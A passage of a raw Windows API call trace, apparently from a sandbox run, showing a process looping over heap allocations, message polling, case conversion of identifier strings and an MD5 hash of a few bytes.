cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0261.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.988] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.988] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.989] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.989] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.989] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0261.989] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.989] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.989] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.990] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.990] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.990] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.990] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.990] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.990] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.990] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.990] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.991] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.991] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.991] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0261.991] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.991] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.992] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.992] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.992] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.992] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.992] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.992] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0261.993] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0261.994] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.994] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.994] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.994] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.995] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0261.995] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.996] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.996] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.996] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.996] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.997] CryptHashData (hHash=0xaa5760, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0261.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 